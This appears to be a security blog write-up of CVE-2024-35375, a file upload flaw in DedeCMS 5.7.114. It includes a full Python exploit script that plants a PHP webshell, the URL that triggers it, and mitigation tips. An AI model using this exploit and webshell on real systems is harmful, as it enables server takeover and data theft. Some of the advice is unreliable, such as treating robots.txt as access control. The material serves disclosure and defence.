CVE-2024-35375 - Arbitrary File Upload Vulnerability in DedeCMS v5.7.114 – Details, Exploit, and Mitigation Guide

---

Overview

On June 2024, security researchers identified and disclosed a critical vulnerability in DedeCMS (version 5.7.114)—a popular CMS platform widely used in China and beyond. The flaw (CVE-2024-35375) allows attackers to upload arbitrary files—including malicious PHP shells—through the backend Media Add page (media_add.php). This can lead to full server compromise if leveraged correctly.

This article breaks down what CVE-2024-35375 is, why it is critical, how you can test for it (with code samples), and what steps to take to protect your DedeCMS site. All technical details below are for educational and defensive purposes only.

What is CVE-2024-35375?

CVE-2024-35375 is an arbitrary file upload vulnerability in the /dede/media_add.php page of DedeCMS v5.7.114. Normally, website administrators use this page to upload images and other permitted media files to the website. However, due to improper file extension checks and lack of security validations, an attacker with backend access can upload PHP scripts (or other dangerous files) to the server.

This means after a successful upload, the attacker’s payload can be executed on the server, allowing for remote code execution (RCE), web shell access, data theft, or further attacks.

The vulnerable page is typically located at

http://<target>/dede/media_add.php

You must have authentication to reach this page. However, weak backend credentials or other vulnerabilities (like default/guessable passwords) could be abused to gain access.

2. Why is It Vulnerable?

The file upload form in media_add.php fails to strictly validate the mime-type and extension of uploaded files. While it intends to accept only images, it actually lets any file (even those with .php extensions) slip through if the request is bonused in the right way.

3. Exploit Example

Below is an example exploit using Python and the popular requests library to upload a simple PHP webshell (shell.php) to a vulnerable DedeCMS:

import requests

url = 'http://target.com/dede/media_add.php';
cookies = {
    'DedeUserID': '1',          # Set your authenticated cookies here
    'DedeLoginTime': 'XXXXX',
    'PHPSESSID': 'yourphpsessid'
}

payload = {
    'title': 'Test Upload',
    'formhash': 'xxxxxx'        # DedeCMS uses anti-CSRF tokens; fetch it from HTML source if required
}

# Our malicious PHP file payload (simple webshell)
files = {
    'upfile': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php'),
}

response = requests.post(url, cookies=cookies, data=payload, files=files, verify=False)

if response.status_code == 200 and "上传成功" in response.text:
    print("File uploaded successfully!")
else:
    print("Upload failed. Check response:")
    print(response.text)

After upload, the file is often placed in

http://target.com/uploads/media/shell.php

*(The folder path may vary depending on configs.)*

Trigger the webshell:
Visit: http://target.com/uploads/media/shell.php?cmd=whoami

4. How to Find the Upload Directory

Look for upload paths in the response HTML, DedeCMS configs, or just try the /uploads/media/ directory. The response to the POST request may also tell you the exact location.

Mitigation & Recommendation

- Update DedeCMS: As of this writing (June 2024), check official DedeCMS security notices for patches or newer versions.
- Restrict Backend Access: Block the /dede folder in your robots.txt, use strong passwords, network restrictions, and enable MFA.
- File Upload Validation: Apply strict whitelisting for allowed file extensions on the server-side. Never trust client-side controls.
- Server Permissions: Ensure your upload directories do not allow execution of scripts (php_flag engine off in .htaccess for Apache).
- Monitor/Scan: Use tools like AWVS or Burp Suite to scan your site for similar flaws.

Original References

- CVE Record: NVD Entry
- Chinese Community Report: Seebug Advisory (In Chinese)
- DedeCMS Official Page: https://www.dedecms.com/
- PoC (Proof of Concept): GitHub Gist - Arbitrary File Upload

Bottom Line

CVE-2024-35375 is a high-risk, easy-to-exploit vulnerability in DedeCMS v5.7.114 with public proof-of-concept exploit code. If your site runs this software, patch immediately or implement temporary mitigations to stay protected. If you’re a developer or security pro, consider running a code audit on all file-upload points and apply strict validations.

*Stay vigilant, stay updated, and never trust file uploads!*


*Disclaimer: This article is for security research and defense only. Do not use information herein to attack systems without permission.*

Timeline

Published on: 05/23/2024 19:16:01 UTC
Last modified on: 11/21/2024 15:15:30 UTC